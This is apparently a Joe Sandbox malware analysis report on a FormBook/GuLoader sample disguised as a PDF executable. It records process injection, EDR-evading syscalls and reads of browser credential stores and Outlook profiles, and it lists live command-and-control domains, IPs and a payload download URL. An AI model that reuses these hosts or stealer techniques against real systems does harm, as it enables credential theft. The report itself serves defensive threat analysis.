        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtDeviceIoControlFile: Direct from: 0x77562A0CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQuerySystemInformation: Direct from: 0x775647ECJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtAllocateVirtualMemory: Direct from: 0x77562B0CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtOpenSection: Direct from: 0x77562D2CJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 3748Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        11
        Masquerading
        1
        OS Credential Dumping
        21
        Security Software Discovery
        Remote Services1
        Email Collection
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        311
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism
        1
        Access Token Manipulation
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        311
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object Model1
        Clipboard Data
        5
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism
        Cached Domain Credentials4
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430949 Sample: BM-FM_NR.24040718PDF.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 96 31 www.weave.game 2->31 33 www.ogunlewefamily.org.ng 2->33 35 24 other IPs or domains 2->35 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 Yara detected GuLoader 2->53 10 BM-FM_NR.24040718PDF.exe 3 35 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 BM-FM_NR.24040718PDF.exe 6 10->13         started        process6 dnsIp7 43 absorbante-calitate.ro 37.251.143.215, 443, 50244 WEBCLASSITRO Romania 13->43 65 Maps a DLL or memory area into another process 13->65 17 asoFfnDVnWYESbbZcbazpTYkAQVO.exe 13->17 injected signatures8 process9 signatures10 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 write.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 2 other signatures 20->61 23 asoFfnDVnWYESbbZcbazpTYkAQVO.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.techfun.info 203.161.49.193, 50266, 50267, 50268 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.lm2ue.us 91.195.240.123, 50282, 50283, 50284 SEDO-ASDE Germany 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        BM-FM_NR.24040718PDF.exe13%VirustotalBrowse
        BM-FM_NR.24040718PDF.exe11%ReversingLabsWin32.Trojan.Generic
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLink
        www.a-two-spa-salon.com0%VirustotalBrowse
        www.techfun.info0%VirustotalBrowse
        badai77resmi.net2%VirustotalBrowse
        www.weave.game0%VirustotalBrowse
        www.muslimsmat.com0%VirustotalBrowse
        www.concretedailypress.net1%VirustotalBrowse
        www.nurenose.com1%VirustotalBrowse
        www.badai77resmi.net3%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.ogunlewefamily.org.ng/8cgp/0%Avira URL Cloudsafe
        http://www.whjzff.com/8cgp/0%Avira URL Cloudsafe
        http://www.387mfyr.sbs/8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd0%Avira URL Cloudsafe
        http://www.nurenose.com/8cgp/0%Avira URL Cloudsafe
        https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin0%Avira URL Cloudsafe
        http://www.concretedailypress.net/8cgp/0%Avira URL Cloudsafe
        http://www.noispisok.com/8cgp/0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://absorbante-calitate.ro/0H0%Avira URL Cloudsafe
        http://www.kansaiwoody.com/8cgp/0%Avira URL Cloudsafe
        http://www.concretedailypress.net/8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd0%Avira URL Cloudsafe
        https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calit0%Avira URL Cloudsafe
        http://www.kader42.top/8cgp/0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        https://absorbante-calitate.ro/0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://www.a-two-spa-salon.com/8cgp/0%Avira URL Cloudsafe
        http://www.techfun.info/8cgp/0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
        http://www.lm2ue.us/8cgp/0%Avira URL Cloudsafe
        http://www.387mfyr.sbs/8cgp/0%Avira URL Cloudsafe
        http://www.donantedeovulos.space/8cgp/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        noispisok.com
        84.32.84.32
        truefalse
          unknown
          www.a-two-spa-salon.com
          157.7.107.63
          truefalseunknown
          parkingpage.namecheap.com
          91.195.240.19
          truefalse
            high
            www.kader42.top
            108.186.8.155
            truefalse
              unknown
              www.lm2ue.us
              91.195.240.123
              truefalse
                unknown
                www.387mfyr.sbs
                137.220.252.40
                truefalse
                  unknown
                  berryandbird.co.uk
                  76.223.105.230
                  truefalse
                    unknown
                    www.arilyfarlico.ru
                    51.77.215.151
                    truefalse
                      unknown
                      www.techfun.info
                      203.161.49.193
                      truefalseunknown
                      ogunlewefamily.org.ng
                      67.225.140.26
                      truefalse
                        unknown
                        badai77resmi.net
                        159.100.14.108
                        truefalseunknown
                        www.donantedeovulos.space
                        64.190.62.22
                        truefalse
                          unknown
                          absorbante-calitate.ro
                          37.251.143.215
                          truefalse
                            unknown
                            www.kansaiwoody.com
                            118.27.122.214
                            truefalse
                              unknown
                              www.whjzff.com
                              173.232.100.113
                              truefalse
                                unknown
                                www.nurenose.com
                                unknown
                                unknowntrueunknown
                                www.weave.game
                                unknown
                                unknowntrueunknown
                                www.lfsig.autos
                                unknown
                                unknowntrue
                                  unknown
                                  www.berryandbird.co.uk
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.fashionagencylab.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.mxgovonline.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.concretedailypress.net
                                        unknown
                                        unknowntrueunknown
                                        www.muslimsmat.com
                                        unknown
                                        unknowntrueunknown
                                        www.ogunlewefamily.org.ng
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.badai77resmi.net
                                          unknown
                                          unknowntrueunknown
                                          www.noispisok.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.nurenose.com/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.387mfyr.sbs/8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kdfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ogunlewefamily.org.ng/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.whjzff.com/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.concretedailypress.net/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.noispisok.com/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kansaiwoody.com/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.concretedailypress.net/8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kdfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kader42.top/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.a-two-spa-salon.com/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.techfun.info/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.lm2ue.us/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.387mfyr.sbs/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.donantedeovulos.space/8cgp/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://nsis.sf.net/NSIS_ErrorErrorBM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                              high
                                              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDBM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                high
                                                http://www.gopher.ftp://ftp.BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://absorbante-calitate.ro/0HBM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calitBM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://nsis.sf.net/NSIS_ErrorBM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                  high
                                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://absorbante-calitate.ro/BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.quovadis.bm0BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ocsp.quovadisoffshore.com0BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  157.7.107.63
                                                  www.a-two-spa-salon.comJapan7506INTERQGMOInternetIncJPfalse
                                                  67.225.140.26
                                                  ogunlewefamily.org.ngUnited States
                                                  32244LIQUIDWEBUSfalse
                                                  137.220.252.40
                                                  www.387mfyr.sbsSingapore
                                                  64050BCPL-SGBGPNETGlobalASNSGfalse
                                                  51.77.215.151
                                                  www.arilyfarlico.ruFrance
                                                  16276OVHFRfalse
                                                  173.232.100.113
                                                  www.whjzff.comUnited States
                                                  62904EONIX-COMMUNICATIONS-ASBLOCK-62904USfalse
                                                  84.32.84.32
                                                  noispisok.comLithuania
                                                  33922NTT-LT-ASLTfalse
                                                  64.190.62.22
                                                  www.donantedeovulos.spaceUnited States
                                                  11696NBS11696USfalse
                                                  91.195.240.123
                                                  www.lm2ue.usGermany
                                                  47846SEDO-ASDEfalse
                                                  91.195.240.19
                                                  parkingpage.namecheap.comGermany
                                                  47846SEDO-ASDEfalse
                                                  37.251.143.215
                                                  absorbante-calitate.roRomania
                                                  34358WEBCLASSITROfalse
                                                  203.161.49.193
                                                  www.techfun.infoMalaysia
                                                  45899VNPT-AS-VNVNPTCorpVNfalse
                                                  108.186.8.155
                                                  www.kader42.topUnited States
                                                  54600PEGTECHINCUSfalse
                                                  118.27.122.214
                                                  www.kansaiwoody.comJapan7506INTERQGMOInternetIncJPfalse
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1430949
                                                  Start date and time:2024-04-24 12:24:33 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 18m 24s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Run name:Suspected Instruction Hammering
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:BM-FM_NR.24040718PDF.exe
                                                  Detection:MAL
                                                  Classification:mal96.troj.spyw.evad.winEXE@7/7@29/13
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 86%
                                                  • Number of executed functions: 89
                                                  • Number of non-executed functions: 279
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  TimeTypeDescription
                                                  12:28:21API Interceptor31357812x Sleep call for process: write.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  157.7.107.63shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.a-two-spa-salon.com/3g97/
                                                  shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.a-two-spa-salon.com/3g97/
                                                  84.32.84.32PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.carsinmultan.com/pq0o/
                                                  VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                                  • www.cordonnerie-7lieues.com/gtit/
                                                  SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                                  • www.cordonnerie-7lieues.com/gtit/
                                                  Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.gamesun.website/cga5/
                                                  NEW ORDER.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • www.thecommunitycatalyst.com/ij84/?0p7=W6O83hZ8u&P6A=1X9vP8E8Ekk9mAg0FaLEi2YPUHH8FmxMVXf3WfBlM0Ba4cTgag1gqfGZIY2i8M3UfgO5
                                                  MT103 Remittance.vbsGet hashmaliciousFormBookBrowse
                                                  • www.cryptoshipping-cargo.site/m07a/
                                                  Xbkrgp2HX73cvU3.exeGet hashmaliciousFormBookBrowse
                                                  • www.elenagilherrero.com/rrei/
                                                  j6kpIFikdc.exeGet hashmaliciousFormBookBrowse
                                                  • www.elenagilherrero.com/rrei/
                                                  r6WrUcBg7ToYT8S.exeGet hashmaliciousFormBookBrowse
                                                  • www.elenagilherrero.com/rrei/?zP=INTTOvU9IKzsDC8jnC91t9KE6zPKFjffbQ3PB1rVUdq65O2damOTnNpGVXayVX3m+HMb4d/p1fbR6UWHB05bp5QsPP04RueT1AJ5un/OSWdMiixP1A==&7Lyt=yVwl4fSP
                                                  our order 6076297.exeGet hashmaliciousFormBookBrowse
                                                  • www.cityrentsatruck.com/e25x/
                                                  64.190.62.22shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.paydayloans3.shop/3g97/
                                                  m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.solar-windturbine.life/q696/
                                                  INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                  • www.paydayloans3.shop/aleu/
                                                  HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                  • www.paydayloans3.shop/aleu/
                                                  narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                  • www.6travel-insurance.xyz/dd20/?GFQL1=zSsDwZvpFiG+zW3meVFxqTB90KbWJdKl2XBal2vs8lrKzMskebZ1s7YKNa51Owxzvzr1&lf20=sBdp88JXEddd9
                                                  n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                  • www.guard-dd.online/kh11/?1bwhTVVh=5AOe8i8fQA+d/RLn8pJP+59XDsSJ3aDT/cyFjnHYvO1StO4m66d0qWdWW06Hjy/7Wfuq&or=3f5pdRHX
                                                  8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                  • www.guard-dd.online/kh11/?yT=H0GxcDi&9r=5AOe8i8fQA+d/RLn8pJP+59XDsSJ3aDT/cyFjnHYvO1StO4m66d0qWdWW3aYoS/FWfyn
                                                  1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.hofiw.link/4bud/
                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                  • www.hofiw.link/m8cr/
                                                  aMVimXl3J6.exeGet hashmaliciousFormBookBrowse
                                                  • www.black-loan3.shop/kh11/?ntS0L=0yJkafcW8nzbNP7bGomjgpqJraTo/XSswctIVgDnSID0J3uCkRMhL6LbKCDoTr01MxshBBLhug==&Yr=DbvxavN0kTq4E
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  www.a-two-spa-salon.comshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 157.7.107.63
                                                  shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 157.7.107.63
                                                  parkingpage.namecheap.comPO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 91.195.240.19
                                                  shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 91.195.240.19
                                                  Pago pendiente.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.19
                                                  PO0423024.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.19
                                                  PO0423023.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.19
                                                  INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.19
                                                  Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  www.kansaiwoody.comshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 118.27.122.214
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
